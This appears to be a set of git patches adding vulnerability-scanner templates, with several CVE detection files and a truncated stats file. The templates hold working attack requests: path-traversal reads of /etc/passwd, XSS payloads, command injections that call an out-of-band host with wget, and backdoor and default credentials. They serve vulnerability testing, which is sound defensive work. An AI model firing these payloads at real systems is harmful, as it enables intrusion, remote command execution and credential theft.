From b62d2c1ccee66511c8f9a2a8553b5699af5b2c88 Mon Sep 17 00:00:00 2001 From: hahwul Date: Sat, 30 Jan 2021 23:27:17 +0900 Subject: [PATCH 001/478] added github-page-files --- exposures/files/github-page-files.yaml | 36 ++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 exposures/files/github-page-files.yaml diff --git a/exposures/files/github-page-files.yaml b/exposures/files/github-page-files.yaml new file mode 100644 index 0000000000..90e8aef0c8 --- /dev/null +++ b/exposures/files/github-page-files.yaml @@ -0,0 +1,36 @@ +id: github-page-files + +info: + name: Github page files + author: hahwul + severity: info + description: Find github page files(_config.yml / CNAME / Gemfile / Gemfile.lock) + +requests: + - method: GET + path: + - "{{BaseURL}}/_config.yml" + - "{{BaseURL}}/CNAME" + - "{{BaseURL}}/Gemfile" + - "{{BaseURL}}/Gemfile.lock" + redirects: true + max-redirects: 1 + headers: + User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jekyll" + - "plugins" + - "baseurl" + - "gem" + - "github-pages" + - "bundler" + - "github.io" + condition: or From 11dec8ac1b3a10c4262388f3de434e006a5eb9a8 Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Wed, 7 Apr 2021 23:11:57 +0300 Subject: [PATCH 002/478] Remove Equal I noticed that some vulnerable sites were being missed out since it expected the site to have APP_* which isn't always the case --- exposures/configs/laravel-env.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 7d775e8148..a085df6b32 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -4,7 +4,6 @@ info: name: Laravel .env file author: pxmme1337 & dwisiswant0 & geeknik & emenalf severity: medium - tags: config,exposure requests: - method: GET @@ -18,11 +17,12 @@ requests: - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" + - "{{BaseURL}}/.env_1 matchers-condition: and matchers: - type: regex regex: - - "(?m)^APP_(NAME|ENV|KEY|DEBUG|URL)=" + - "(NAME|ENV|KEY|DEBUG|URL|PASSWORD)" - type: status status: - 200 From 31f9cf4838b57255de9653189df535a396926b2a Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Wed, 7 Apr 2021 23:17:02 +0300 Subject: [PATCH 003/478] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index a085df6b32..c43fe621f0 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -17,7 +17,7 @@ requests: - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" - - "{{BaseURL}}/.env_1 + - "{{BaseURL}}/.env_1" matchers-condition: and matchers: - type: regex From af25782bf4a596817c26086778223c7aa5e6f5df Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Thu, 8 Apr 2021 01:22:43 +0300 Subject: [PATCH 005/478] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index c43fe621f0..6e15d9fb58 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -17,6 +17,7 @@ requests: - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" + - "{{BaseURL}}/.env.old" - "{{BaseURL}}/.env_1" matchers-condition: and matchers: From e5824a72f64ef02c1a0e00669917d27d14f9b584 Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Thu, 8 Apr 2021 01:31:27 +0300 Subject: [PATCH 006/478] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 6e15d9fb58..5113b67890 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -19,6 +19,7 @@ requests: - "{{BaseURL}}/.env.live" - "{{BaseURL}}/.env.old" - "{{BaseURL}}/.env_1" + - "{{BaseURL}}/.env_sample" matchers-condition: and matchers: - type: regex From 19914dd2cfeda1ccdbaa436dee0ccc514324bd15 Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Sat, 10 Apr 2021 00:20:35 +0300 Subject: [PATCH 007/478] Add files via upload --- exposures/configs/codeigniter-env.yaml | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposures/configs/codeigniter-env.yaml diff --git a/exposures/configs/codeigniter-env.yaml b/exposures/configs/codeigniter-env.yaml new file mode 100644 index 0000000000..b1a1b0c02b --- /dev/null +++ b/exposures/configs/codeigniter-env.yaml @@ -0,0 +1,30 @@ +id: codeigniter-env + +info: + name: Codeigniter .env file + author: emenalf + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/.env" + - "{{BaseURL}}/.env.dev.local" + - "{{BaseURL}}/.env.development.local" + - "{{BaseURL}}/.env.prod.local" + - "{{BaseURL}}/.env.production.local" + - "{{BaseURL}}/.env.local" + - "{{BaseURL}}/.env.example" + - "{{BaseURL}}/.env.stage" + - "{{BaseURL}}/.env.live" + - "{{BaseURL}}/.env_1" + - "{{BaseURL}}/.env.old" + - "{{BaseURL}}/.env_sample" + matchers-condition: and + matchers: + - type: regex + regex: + - "(NAME|ENV|KEY|DEBUG|URL|PASSWORD)" + - type: status + status: + - 200 From 93cb25d1b1cfbbb24edf853eb3da7c243bade0fe Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Sat, 10 Apr 2021 00:24:44 +0300 Subject: [PATCH 008/478] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 5113b67890..62a4df78a1 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -24,7 +24,7 @@ requests: matchers: - type: regex regex: - - "(NAME|ENV|KEY|DEBUG|URL|PASSWORD)" + - "(?m)^APP_(NAME|ENV|KEY|DEBUG|URL)=" - type: status status: - 200 From dcc29c608b58ad740742a4a54d652040a18acc98 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 3 Jul 2021 18:47:19 +0900 Subject: [PATCH 009/478] Create CVE-2019-9618.yaml --- CVE-2019-9618.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 CVE-2019-9618.yaml diff --git a/CVE-2019-9618.yaml b/CVE-2019-9618.yaml new file mode 100644 index 0000000000..a0f12ed444 --- /dev/null +++ b/CVE-2019-9618.yaml @@ -0,0 +1,23 @@ +id: cve-2019-9618 +info: + name: GraceMedia Media Player 1.0 - Local File Inclusion + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/46537 + tags: wp,cves,wordpress,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From f21b23985364508a27ad5fa14476fbf4c2c334cd Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 3 Jul 2021 15:23:28 +0530 Subject: [PATCH 010/478] misc changes --- CVE-2019-9618.yaml => cves/2020/CVE-2019-9618.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) rename CVE-2019-9618.yaml => cves/2020/CVE-2019-9618.yaml (66%) diff --git a/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml similarity index 66% rename from CVE-2019-9618.yaml rename to cves/2020/CVE-2019-9618.yaml index a0f12ed444..bc0a6e0e6d 100644 --- a/CVE-2019-9618.yaml +++ b/cves/2020/CVE-2019-9618.yaml @@ -1,10 +1,13 @@ -id: cve-2019-9618 +id: CVE-2019-9618 + info: name: GraceMedia Media Player 1.0 - Local File Inclusion author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/46537 - tags: wp,cves,wordpress,lfi + severity: critical + reference: | + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 + tags: cve,cve2019,wordpress,wp-plugin,lfi requests: - method: GET @@ -20,4 +23,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 9360b48a90e53bf93a36094bbdc9ed71a08d1a1b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 18:03:53 +0700 Subject: [PATCH 011/478] Create CVE-2021-24235.yaml --- cves/2021/CVE-2021-24235.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-24235.yaml diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml new file mode 100644 index 0000000000..084545c4e4 --- /dev/null +++ b/cves/2021/CVE-2021-24235.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-24235 + +info: + name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13' + + matchers-condition: and + matchers: + - type: word + words: + - "/Onfocus=alert(123);" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 8592ef0388bf8451230b63f24de03e5939d546b3 Mon Sep 17 00:00:00 2001 From: pratikkhalane Date: Mon, 19 Jul 2021 01:46:22 +0530 Subject: [PATCH 012/478] .\Tieline\Tieline.yaml --- default-logins/Tieline/Tieline.yaml | 40 +++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 default-logins/Tieline/Tieline.yaml diff --git a/default-logins/Tieline/Tieline.yaml b/default-logins/Tieline/Tieline.yaml new file mode 100644 index 0000000000..e774acdba7 --- /dev/null +++ b/default-logins/Tieline/Tieline.yaml @@ -0,0 +1,40 @@ +id: Tieline-default-credentials + +info: + name: Tieline Default Credentials Detection Template + author: Pratik Khalane + severity: high + description: Finding the Tieline Admin Panels with default credentials. + reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c + tags: Tieline,default-login + +#Payloads: + +#Username - admin +#Password - password + +requests: + - method: GET + path: + - '{{BaseURL}}/api/get_device_details' + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 + Referer: '{{BaseURL}}/assets/base/home.html' + Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"' + + matchers-condition: and + matchers: + - type: word + words: + - "" + - "" + condition: and + + - type: word + words: + - "text/xml" + part: header + + - type: status + status: + - 200 \ No newline at end of file From 7f0295a4158da056b80cc20f8089970ecb87b5b5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 22 Jul 2021 14:11:50 +0530 Subject: [PATCH 013/478] Added DNSSEC Detection --- dns/dnssec-detection.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 dns/dnssec-detection.yaml diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml new file mode 100644 index 0000000000..7c64193c85 --- /dev/null +++ b/dns/dnssec-detection.yaml @@ -0,0 +1,22 @@ +id: dnssec-detection + +info: + name: DNSSEC Detection + description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled. + author: pdteam + severity: info + tags: dns,dnssec + reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/ + +dns: + - name: "{{FQDN}}" + type: DS + class: inet + recursion: true + retries: 3 + + extractors: + - type: regex + group: 1 + regex: + - "IN\tDS\t(.+)" From a525e8c80a6678d3044376287253c4eca5a82430 Mon Sep 17 00:00:00 2001 From: meme-lord <17912559+meme-lord@users.noreply.github.com> Date: Mon, 26 Jul 2021 18:10:23 +0100 Subject: [PATCH 014/478] Added Prestashop module fuzz template --- fuzzing/prestashop-module-fuzz.yaml | 35 ++ helpers/wordlists/prestashop-modules.txt | 639 +++++++++++++++++++++++ 2 files changed, 674 insertions(+) create mode 100644 fuzzing/prestashop-module-fuzz.yaml create mode 100644 helpers/wordlists/prestashop-modules.txt diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml new file mode 100644 index 0000000000..4ea4775c8a --- /dev/null +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -0,0 +1,35 @@ +id: prestashop-module-fuzz +info: + name: Prestashop Modules Fuzz + author: meme-lord + severity: info + tags: fuzz,prestashop + +requests: + + - payloads: + path: helpers/wordlists/prestashop-modules.txt + + attack: sniper + threads: 50 + + raw: + - | + GET /modules/{{path}}/config.xml HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + + matchers-condition: and + matchers: + - type: word + words: + - "" + + extractors: + - type: regex + part: body + group: 2 + regex: + - '( Date: Tue, 27 Jul 2021 02:27:13 +0900 Subject: [PATCH 015/478] Create CVE-2018-10818.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. Signed-off-by: GwanYeong Kim --- cves/2018/CVE-2018-10818.yaml | 42 +++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2018/CVE-2018-10818.yaml diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml new file mode 100644 index 0000000000..d4bd7cea24 --- /dev/null +++ b/cves/2018/CVE-2018-10818.yaml @@ -0,0 +1,42 @@ +id: CVE-2018–10818 + +info: + name: LG NAS Devices - Remote Code Execution (Unauthenticated) + author: gy741 + severity: critical + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + reference: | + - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ + - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 + tags: cve,cve2018,lg-nas,rce + +requests: + - raw: + - | + POST /system/sharedir.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: curl/7.58.0 + Accept: */* + Content-Type: application/x-www-form-urlencoded + + &uid=10; wget http://{{interactsh-url}} + + - | + POST /en/php/usb_sync.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: curl/7.58.0 + Accept: */* + Content-Type: application/x-www-form-urlencoded + + &act=sync&task_number=1;wget http://{{interactsh-url}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 From eadc9b4dac47a0037a4c703ec64dbb5acffec752 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 27 Jul 2021 02:48:31 +0900 Subject: [PATCH 016/478] Create kevinlab-hems-backdoor.yaml The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. Signed-off-by: GwanYeong Kim --- .../other/kevinlab-hems-backdoor.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/other/kevinlab-hems-backdoor.yaml diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml new file mode 100644 index 0000000000..d21e3cacdc --- /dev/null +++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml @@ -0,0 +1,36 @@ +id: kevinlab-hems-backdoor + +info: + name: KevinLAB HEMS Undocumented Backdoor Account + author: gy741 + severity: critical + description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + tags: kevinlab + +requests: + - raw: + - | + POST /dashboard/proc.php?type=login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + userid=kevinlab&userpass=kevin003 + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - "!contains(body_1, 'alert')" + - "contains(body_1, 'meta http-equiv')" + condition: and + + - type: status + status: + - 200 From 47110e15cec7a17f084e1a7eacbaf20328fede82 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 27 Jul 2021 06:04:27 +0700 Subject: [PATCH 017/478] Create CVE-2016-1000153.yaml --- cves/2016/CVE-2016-1000153.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000153.yaml diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml new file mode 100644 index 0000000000..c71b4ef368 --- /dev/null +++ b/cves/2016/CVE-2016-1000153.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000153 + +info: + name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 9db92fa24c3f3a05b535f197255f9a363b3883c8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 27 Jul 2021 06:09:33 +0700 Subject: [PATCH 018/478] Create CVE-2016-1000155.yaml --- cves/2016/CVE-2016-1000155.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000155.yaml diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml new file mode 100644 index 0000000000..68e4fc346b --- /dev/null +++ b/cves/2016/CVE-2016-1000155.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000155 + +info: + name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 5d5dafc6e72e7fa366b2422d0dc74346928e36ea Mon Sep 17 00:00:00 2001 From: juan mesaglio Date: Mon, 26 Jul 2021 20:12:26 -0300 Subject: [PATCH 019/478] Detect azure directory traversal hosts file --- .../other/azure-path-traversal.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/azure-path-traversal.yaml diff --git a/vulnerabilities/other/azure-path-traversal.yaml b/vulnerabilities/other/azure-path-traversal.yaml new file mode 100644 index 0000000000..e8561db2aa --- /dev/null +++ b/vulnerabilities/other/azure-path-traversal.yaml @@ -0,0 +1,28 @@ +id: azure-directory-traversal + +info: + name: Azure Directory Traversal + author: mesaglio + severity: high + description: Detect azure directory traversal hosts file. + +requests: + - method: GET + path: + - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/system32/drivers/etc/hosts" + - "{{BaseURL}}/./../../../../../../../../../../windows/system32/drivers/etc/hosts" + - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/system32/drivers/etc/hosts" + - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/system32/drivers/etc/hosts" + - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/system32/drivers/etc/hosts" + - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/system32/drivers/etc/hosts" + - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts" + + matchers-condition: or + matchers: + - type: status + status: + - 200 + - type: word + words: + - "localhost" + part: body \ No newline at end of file From c8b1186d80aed03105a6ae2214ff4870010bf319 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 07:15:56 +0700 Subject: [PATCH 020/478] Create opensis-detect.yaml --- technologies/opensis-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/opensis-detect.yaml diff --git a/technologies/opensis-detect.yaml b/technologies/opensis-detect.yaml new file mode 100644 index 0000000000..bf71bbe890 --- /dev/null +++ b/technologies/opensis-detect.yaml @@ -0,0 +1,25 @@ +id: opensis-detect + +info: + name: OpenSIS Detect + author: pikpikcu + severity: info + tags: tech,opensis + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/opensis/index.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "openSIS Student Information System" + + - type: status + status: + - 200 From 12b832cc364fe52ea83f320a861fdc16b0509a69 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 27 Jul 2021 09:24:35 +0900 Subject: [PATCH 021/478] Create CVE-2021-32305.yaml WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-32305.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-32305.yaml diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml new file mode 100644 index 0000000000..b188151e6b --- /dev/null +++ b/cves/2021/CVE-2021-32305.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-32305 + +info: + name: Websvn 2.6.0 - Remote Code Execution (Unauthenticated) + description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + author: gy741 + severity: critical + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 + - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html + tags: cve,cve2021,websvn,rce,oob + +requests: + - raw: + - | + GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.18.4 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 44c0757a23ac9d334927a37008ea44c4cc651a3e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 27 Jul 2021 00:25:35 +0000 Subject: [PATCH 022/478] Auto Generated Templates Stats [Tue Jul 27 00:25:35 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1215 +++++++++++++++++++++--------------------- TOP-10.md | 8 +- 3 files changed, 613 insertions(+), 612 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 7f012a1194..4f260da111 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"ka